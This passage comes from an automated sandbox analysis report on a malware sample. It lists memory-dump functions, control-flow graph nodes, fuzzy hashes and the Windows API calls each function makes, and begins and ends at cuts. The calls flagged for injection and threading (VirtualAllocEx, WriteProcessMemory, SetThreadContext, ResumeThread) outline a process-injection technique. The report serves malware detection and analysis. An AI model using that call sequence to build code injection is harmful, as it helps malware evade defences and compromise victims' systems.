51b804e-51b8110 call 51b759c call 51b75ac call 51b75bc call 51b75cc call 51b75dc call 51b749c call 51b577c 672->675 676 51b8042-51b8044 674->676 677 51b8040 674->677 696 51b8117-51b811f 675->696 676->675 677->675 705 51b8121 call 51bc218 696->705 706 51b8121 call 51bc207 696->706 697 51b8126-51b8135 call 51b75ec 707 51b8137 call 51bc218 697->707 708 51b8137 call 51bc207 697->708 700 51b813c-51b813e call 51b75ec 702 51b8143-51b814a 700->702 703->601 704->601 705->697 706->697 707->700 708->700
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399107829.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_51b0000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ($($($)$)$)$)$)$.$4'gq$9~
                                                  • API String ID: 0-2694923017
                                                  • Opcode ID: 6d0f8b7a63bd5dcb304aa758fde5cd643cfce64d4094ff24cd187c1ea00c54be
                                                  • Instruction ID: 328f92b31fa5475cd5509055465fa65b1263780dff54b0cd8133ce4864df334a
                                                  • Opcode Fuzzy Hash: 6d0f8b7a63bd5dcb304aa758fde5cd643cfce64d4094ff24cd187c1ea00c54be
                                                  • Instruction Fuzzy Hash: 30524830A10704CFDB04EF74C894A99B7B2FFC9300F1586A8D9096F3A5DB75A985CB91
                                                  Function 0528E190 Relevance: .7, Instructions: 651COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 28871c8567095a17a657f22ea56d2e6f7980394308f6439a77b23272c7dbbd32
                                                  • Instruction ID: 4b8ed9e41bcfb2fbaefe4c13395b4bebfafe895cb2c258deb4f264b1b31126e8
                                                  • Opcode Fuzzy Hash: 28871c8567095a17a657f22ea56d2e6f7980394308f6439a77b23272c7dbbd32
                                                  • Instruction Fuzzy Hash: 3442E634722610CFCB28ABB4C4586697BF6BF89705F2188ADE50BDF3A4DE319941CB51
                                                  Function 071CFA50 Relevance: .5, Instructions: 542COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1401298416.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_71c0000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 97dad03d303bc26fd9d04c9adb77e87ffebd8e5d90f34aafccdae1a57f6b9ecf
                                                  • Instruction ID: 08a96643b1ff2538c8e1548254857a27a6dc8ae7bf3708b3d0330dd032a24df6
                                                  • Opcode Fuzzy Hash: 97dad03d303bc26fd9d04c9adb77e87ffebd8e5d90f34aafccdae1a57f6b9ecf
                                                  • Instruction Fuzzy Hash: 90C19BB17006018FDB1AEBB5C560B6AB7FBAF89700F14446DD14A9B2D1DF34E902CB61
                                                  Function 0528E180 Relevance: .4, Instructions: 351COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f63ae34145aba3e0bc2fdd1c3b1c188cbd9ac38b3191612ade7be798d2a3aa13
                                                  • Instruction ID: f1c93d194ecb9600e484e5f40d1c34c60efe7246a9bbc58d829c0433e74e7bbc
                                                  • Opcode Fuzzy Hash: f63ae34145aba3e0bc2fdd1c3b1c188cbd9ac38b3191612ade7be798d2a3aa13
                                                  • Instruction Fuzzy Hash: 43E10734726611CFCB28EFB4C458A797BBABF89701F25486DE50B9B3A0DB319941CB11
                                                  Function 071C6E07 Relevance: .1, Instructions: 82COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1401298416.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_71c0000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fb632587aab84faa3f300171ba3a2d1b8c2e9f4a9613be0c99f024d829d72945
                                                  • Instruction ID: 00056e9061a93f7c4737e9e9526672cffe70a29bdb2d285edf21002b984b48d8
                                                  • Opcode Fuzzy Hash: fb632587aab84faa3f300171ba3a2d1b8c2e9f4a9613be0c99f024d829d72945
                                                  • Instruction Fuzzy Hash: BA3125B0D042588BDB19CFEAC8593DEBFB2BF99300F04C46AD509AB294DB750989CF40
                                                  Function 071C6E18 Relevance: .1, Instructions: 78COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1401298416.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_71c0000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3c5307a7ad52aec736f33bcd745b62971c772843f712e3218203ccba341da56e
                                                  • Instruction ID: 379269e92232ce1f61f5438ad42b91448956030b31176747a9769afb2ce6e463
                                                  • Opcode Fuzzy Hash: 3c5307a7ad52aec736f33bcd745b62971c772843f712e3218203ccba341da56e
                                                  • Instruction Fuzzy Hash: 8731E4B0D146188BEB18CF9AC8493EEFBF6BF99300F04C42AD509A6294DBB50945CF40
                                                  Function 0528F920 Relevance: 2.8, Strings: 2, Instructions: 320COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 768 528f920-528f958 770 528f95a-528f965 768->770 771 528f9a4-528f9a8 768->771 774 528fa99-528fac5 770->774 775 528f96b-528f971 770->775 772 528f9aa-528f9ac 771->772 773 528f9ae-528f9b0 771->773 776 528f9b3-528f9b7 772->776 773->776 777 528facc-528fb28 774->777 775->777 778 528f977-528f979 775->778 780 528f9b9-528f9bb 776->780 781 528f9e2-528f9e4 776->781 816 528fc7e-528fc82 777->816 817 528fb2e-528fb76 777->817 778->777 782 528f97f-528f982 778->782 783 528f9bd-528f9bf 780->783 784 528f9c1 780->784 787 528f9ea-528fa1b 781->787 788 528fa6b-528fa6f 781->788 785 528f988 782->785 786 528f984-528f986 782->786 791 528f9c6-528f9e1 783->791 784->791 794 528f98d-528f993 785->794 786->794 803 528fa1d-528fa20 787->803 804 528fa22-528fa24 787->804 792 528fa78 788->792 793 528fa71-528fa76 788->793 795 528fa7b-528fa98 792->795 793->795 796 528f99a 794->796 797 528f995-528f998 794->797 802 528f99f-528f9a2 796->802 797->802 802->776 803->804 805 528fa2d 804->805 806 528fa26-528fa2b 804->806 809 528fa2f-528fa3c 805->809 806->809 812 528fa44-528fa46 809->812 814 528fa48-528fa61 812->814 815 528fa63-528fa6a 812->815 814->815 818 528fc8f-528fca2 816->818 819 528fc84-528fc8e 816->819 826 528fc3b-528fc3f 817->826 827 528fb7c-528fb95 817->827 828 528fc6d-528fc70 826->828 829 528fc41-528fc6b 826->829 834 528fb9f-528fbad 827->834 835 528fb97-528fb9a 827->835 831 528fc78-528fc7b 828->831 829->831 831->816 840 528fbbb 834->840 841 528fbaf-528fbb9 834->841 837 528fc28-528fc35 835->837 837->826 837->827 843 528fbbd-528fbbf 840->843 841->843 844 528fbc1 843->844 845 528fbc4-528fbe8 843->845 844->845 847 528fbea-528fbf4 845->847 848 528fbf6 845->848 849 528fbf8-528fbfa 847->849 848->849 849->837 850 528fbfc-528fc09 849->850 851 528fc0b 850->851 852 528fc0d 850->852 853 528fc0f-528fc1f 851->853 852->853 854 528fc21 853->854 855 528fc23 853->855 856 528fc25 854->856 855->856 856->837
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Hkq$Hkq
                                                  • API String ID: 0-2158860719
                                                  • Opcode ID: 9d4679fbf0b3224272a002532c3809f9d752d0c602f348a69f949ad464fb3fee
                                                  • Instruction ID: 826e17a6077208f85464a497c6d849e6981981e78122e719b02ae1a2d010624d
                                                  • Opcode Fuzzy Hash: 9d4679fbf0b3224272a002532c3809f9d752d0c602f348a69f949ad464fb3fee
                                                  • Instruction Fuzzy Hash: 15C18C31B216069FCB14EFA9C5845BEBBF6FF88310F208569D816E7790DB34E9518B90
                                                  Function 05283320 Relevance: 2.7, Strings: 2, Instructions: 209COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 857 5283320-5283382 call 528269c 863 52833e8-5283414 857->863 864 5283384-5283386 857->864 865 528341b-5283423 863->865 864->865 866 528338c-5283398 864->866 871 528342a-5283565 865->871 866->871 872 528339e-52833d9 call 52826a8 866->872 889 528356b-5283579 871->889 883 52833de-52833e7 872->883 890 528357b-5283581 889->890 891 5283582-52835c8 889->891 890->891 896 52835ca-52835cd 891->896 897 52835d5 891->897 896->897 898 52835d6 897->898 898->898
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Hkq$Hkq
                                                  • API String ID: 0-2158860719
                                                  • Opcode ID: a4519c19d3a6f3e200ca64cab79ec1b0b1435a2c73f69ab8c77bc0109ae024ca
                                                  • Instruction ID: 191b065f4babcccca501515f89e1431e5dcc401dd4faa7c32b8f3cbe7d2cc5bb
                                                  • Opcode Fuzzy Hash: a4519c19d3a6f3e200ca64cab79ec1b0b1435a2c73f69ab8c77bc0109ae024ca
                                                  • Instruction Fuzzy Hash: DA817DB5E102188FCB14DFA9C8946EEBBF6FF88310F14852AD409EB394DB745945CBA1
                                                  Function 05283D30 Relevance: 2.7, Strings: 2, Instructions: 177COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 899 5283d30-5283d52 902 5283d5b-5283d6b 899->902 903 5283d54-5283e2f 899->903 905 5283d71-5283d81 902->905 906 5283e36-5283f08 902->906 903->906 905->906 907 5283d87-5283d8b 905->907 925 5283f0f-5283f21 906->925 909 5283d8d 907->909 910 5283d93-5283db2 907->910 909->906 909->910 912 5283dd9-5283dde 910->912 913 5283db4-5283dd4 call 5283054 call 5282ed0 call 5282ee0 910->913 914 5283de0-5283de2 call 5283064 912->914 915 5283de7-5283dfa call 5282eac 912->915 913->912 914->915 915->925 926 5283e00-5283e07 915->926 935 5283f3d 925->935 936 5283f23-5283f2a 925->936 936->935
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (kq$Hkq
                                                  • API String ID: 0-2388542449
                                                  • Opcode ID: 1cdfe885f1bdfdc4c71ab99cb2b858cd3e41007836852434ccfa4e287be48ced
                                                  • Instruction ID: fc44be10b55446070be31af037074d995160182c98876ac91ed1fe35e141713f
                                                  • Opcode Fuzzy Hash: 1cdfe885f1bdfdc4c71ab99cb2b858cd3e41007836852434ccfa4e287be48ced
                                                  • Instruction Fuzzy Hash: A051FF72B111098FCB14EFA8C8486BF7FE7EFC4710F248969E50A9B3E4DA3498018795
                                                  Function 05282EF0 Relevance: 2.7, Strings: 2, Instructions: 155COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1083 5282ef0-5283d52 1086 5283d5b-5283d6b 1083->1086 1087 5283d54-5283e2f 1083->1087 1089 5283d71-5283d81 1086->1089 1090 5283e36-5283f08 1086->1090 1087->1090 1089->1090 1091 5283d87-5283d8b 1089->1091 1109 5283f0f-5283f21 1090->1109 1093 5283d8d 1091->1093 1094 5283d93-5283db2 1091->1094 1093->1090 1093->1094 1096 5283dd9-5283dde 1094->1096 1097 5283db4-5283dd4 call 5283054 call 5282ed0 call 5282ee0 1094->1097 1098 5283de0-5283de2 call 5283064 1096->1098 1099 5283de7-5283dfa call 5282eac 1096->1099 1097->1096 1098->1099 1099->1109 1110 5283e00-5283e07 1099->1110 1119 5283f3d 1109->1119 1120 5283f23-5283f2a 1109->1120 1120->1119
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (kq$Hkq
                                                  • API String ID: 0-2388542449
                                                  • Opcode ID: b1100421f89eadcd8f5ce5635ac957bcd2ee7e099df134e10a9f51d928c2ee83
                                                  • Instruction ID: 27bc15d9a957a5c19090692cfb10007b472b50c5540796a8357f91272fd38ed0
                                                  • Opcode Fuzzy Hash: b1100421f89eadcd8f5ce5635ac957bcd2ee7e099df134e10a9f51d928c2ee83
                                                  • Instruction Fuzzy Hash: 0551D071B111458FCB24EBB8C8442BF7EE7AFC4710F248969E506AB3D4DE389C4187A9
                                                  Function 071CD118 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071CD34E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1401298416.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_71c0000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 9099504832d3688d1a5f62df434e7b348378e70d59e07cfa4a67007b72b01a03
                                                  • Instruction ID: afe36039250cbc58e81f43644867ab5692ffa3c35652d2e353b27e9975a81d0b
                                                  • Opcode Fuzzy Hash: 9099504832d3688d1a5f62df434e7b348378e70d59e07cfa4a67007b72b01a03
                                                  • Instruction Fuzzy Hash: 94916EB1E00219CFDF25CFA8D841BDDBBB2BF58314F1481A9D849A7280DB749985CF91
                                                  Function 02AAAED0 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 02AAB126
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1389033174.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2aa0000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 0cdd1f8280e89921d816faec9f3582bdce6312ec08e946a4c1143d5cadcd3fb9
                                                  • Instruction ID: c9fdc8dec6c67656c2ce20708668cc7ad68eab03d0cb4d58bd987a85d1a0b940
                                                  • Opcode Fuzzy Hash: 0cdd1f8280e89921d816faec9f3582bdce6312ec08e946a4c1143d5cadcd3fb9
                                                  • Instruction Fuzzy Hash: E17136B0A00B058FDB24DF2AD5A475ABBF1FF88304F10892ED48AD7A50DB75E945CB91
                                                  Function 051B0BFC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 051B4381
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399107829.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_51b0000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID:
                                                  • API String ID: 2714655100-0
                                                  • Opcode ID: 1dc7761c0fa2f9773570345096a9934c9daee16c51952f59600a69e7e82d538b
                                                  • Instruction ID: cd1c330a1ea9449e105e9aa584a3f07adc109fda9600c50bed2335e8c11bf632
                                                  • Opcode Fuzzy Hash: 1dc7761c0fa2f9773570345096a9934c9daee16c51952f59600a69e7e82d538b
                                                  • Instruction Fuzzy Hash: A9412CB4900315CFDB14CF99C448EAABBF6FF88314F19C559D519AB321D7B5A841CBA0
                                                  Function 02AA449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 02AA59A9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1389033174.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2aa0000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 4952d7c3d6a5f256f088956e5b27f59d0eda3b76be0a02c68908d6998bc81204
                                                  • Instruction ID: 163e2cb6d9e82154800b3067937bd117dba1b69286584f24d1d488840f384698
                                                  • Opcode Fuzzy Hash: 4952d7c3d6a5f256f088956e5b27f59d0eda3b76be0a02c68908d6998bc81204
                                                  • Instruction Fuzzy Hash: 7F41F2B0D00719CFDB24CFA9C884B8DBBF5BF48304F60806AD409AB251DB756945CF90
                                                  Function 02AA58ED Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 02AA59A9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1389033174.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2aa0000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 37afd05ad9bf16c72cd1370bffc027fb27e76b21aee0643081f1b3e1eccbd8dc
                                                  • Instruction ID: efb4260c8c961091b146e609ad59286d5903175554aa14dd97341566865807a1
                                                  • Opcode Fuzzy Hash: 37afd05ad9bf16c72cd1370bffc027fb27e76b21aee0643081f1b3e1eccbd8dc
                                                  • Instruction Fuzzy Hash: 8B41F2B0D00619CFDB24CFA9C895BCDBBF2BF49314F60806AD449AB251DB75694ACF90
                                                  Function 071CCE90 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 071CCF20
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1401298416.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_71c0000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: c592c880e5a774f499ea8575649ad8eea40939c255622602100fa5acac332ad8
                                                  • Instruction ID: d3fb8728ff86b1fad61d6a2b7493af97d6b8b6e39f04f91a8ee1107725a643de
                                                  • Opcode Fuzzy Hash: c592c880e5a774f499ea8575649ad8eea40939c255622602100fa5acac332ad8
                                                  • Instruction Fuzzy Hash: E92139B59003599FDB10CFAAC881BDEBBF5FF48320F148429E919A7240C7799940DFA0
                                                  Function 02AACA40 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02AAD366,?,?,?,?,?), ref: 02AAD427
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1389033174.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2aa0000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 6e43165f0fcce6861bdaca10a360011eb6ff4e1167f614a9ca346ef13730a7ce
                                                  • Instruction ID: c8fbddedb43f2d8a9dfb1c4520c44293b3be5ac7157fd3b34072b1c9bec4162d
                                                  • Opcode Fuzzy Hash: 6e43165f0fcce6861bdaca10a360011eb6ff4e1167f614a9ca346ef13730a7ce
                                                  • Instruction Fuzzy Hash: 1621E3B5900648DFDB10CF9AD984AEEFBF8EF48320F14845AE954A7310D379A940CFA5
                                                  Function 02AAD398 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02AAD366,?,?,?,?,?), ref: 02AAD427
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1389033174.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2aa0000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 44463e6d390b6eaa791c128c26fc0b931f86bff179005b35a703b65902f916c2
                                                  • Instruction ID: b5a8814394de92fcc5ec20b412fc6f659cc44c23647a6c72f60b1a9d92e652fe
                                                  • Opcode Fuzzy Hash: 44463e6d390b6eaa791c128c26fc0b931f86bff179005b35a703b65902f916c2
                                                  • Instruction Fuzzy Hash: 4021E0B5D00259DFDB10CFAAD984ADEBBF5EF48320F14841AE918A7350D378A954CF61
                                                  Function 071CCF80 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071CD000
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1401298416.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_71c0000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: c68a3b09e3d57f94751371b34676f8fffb42d744a17df08be0390fa2a4f7fdb1
                                                  • Instruction ID: 1695a15fd6d3aa312a32f7904a875999344106ae74ac45f1858621d083c7520f
                                                  • Opcode Fuzzy Hash: c68a3b09e3d57f94751371b34676f8fffb42d744a17df08be0390fa2a4f7fdb1
                                                  • Instruction Fuzzy Hash: A32137B1D002599FDB10CFAAC881AEEFBF5FF48320F50842AE559A7250C7799940DBA0
                                                  Function 071CCCF8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071CCD76
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1401298416.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_71c0000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: 091e3e71029762f3f6ce6314d835c93fa110f8aa084c710b18629ac8f2d5d25c
                                                  • Instruction ID: fd124eaaa7d51c14b2baabea578316738e19773f3c573ad405a9357ab7d0010a
                                                  • Opcode Fuzzy Hash: 091e3e71029762f3f6ce6314d835c93fa110f8aa084c710b18629ac8f2d5d25c
                                                  • Instruction Fuzzy Hash: 962118B1D002498FDB10DFAAC485BAEBFF4EF98324F148429D519A7240DB789944CFA1
                                                  Function 02AAB159 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 02AAB126
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1389033174.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2aa0000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: e106e80d30ca12f8572e85ae7a1dbd9a5f5f214a7da5956ae255c0a09f1af580
                                                  • Instruction ID: 146e8d964f03aa42324b8ed4c9486eb3269c81de586f9de7ec44f69628666e5d
                                                  • Opcode Fuzzy Hash: e106e80d30ca12f8572e85ae7a1dbd9a5f5f214a7da5956ae255c0a09f1af580
                                                  • Instruction Fuzzy Hash: 9711E376A002448FEB10DF6AD8507ABBBF6EFC4318F14886AD00897251CB74A909CFB0
                                                  Function 071CCDD0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071CCE3E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1401298416.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_71c0000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 783b270bae4f4e08304b36f34416f57953d9232343a3aa050b38f0ed86cdcd9b
                                                  • Instruction ID: c4ccb64ea6bc850b1bc0878e5ab42557edc5d421b98b47117c1001e5c094f5a2
                                                  • Opcode Fuzzy Hash: 783b270bae4f4e08304b36f34416f57953d9232343a3aa050b38f0ed86cdcd9b
                                                  • Instruction Fuzzy Hash: A71149759002499FDB10DFAAC844ADFFFF5EF98320F148819E519A7250C7759940DFA0
                                                  Function 071CC840 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1401298416.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_71c0000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 9e82f347a964a32b7165706b9591b6d7fd5c6eefcf17d59fa90e22ed108cf18d
                                                  • Instruction ID: 1251fc097dce260b4710f2802aa0a884337e9d1d97795017e687f30e74a3bea6
                                                  • Opcode Fuzzy Hash: 9e82f347a964a32b7165706b9591b6d7fd5c6eefcf17d59fa90e22ed108cf18d
                                                  • Instruction Fuzzy Hash: 89113AB1D002498FDB20DFAAC94579FFBF4EF98324F248419D519A7640CB796940CFA0
                                                  Function 02AAB0C0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 02AAB126
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1389033174.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2aa0000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: e5fc79f0d8e17bab99f8c37a3b2a427bb20270a8f5878a538c510fa6341369ce
                                                  • Instruction ID: 0fb10704048047af82c60418bd33c7641025f34754152c27d3efd382dd61b217
                                                  • Opcode Fuzzy Hash: e5fc79f0d8e17bab99f8c37a3b2a427bb20270a8f5878a538c510fa6341369ce
                                                  • Instruction Fuzzy Hash: B111E0B5C006498FCB20CF9AD844ADEFBF4EF88324F14896AD429B7610D779A545CFA1
                                                  Function 071CF3B0 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PostMessageW.USER32(?,?,?,?), ref: 071CF40D
                                                  Memory Dump Source
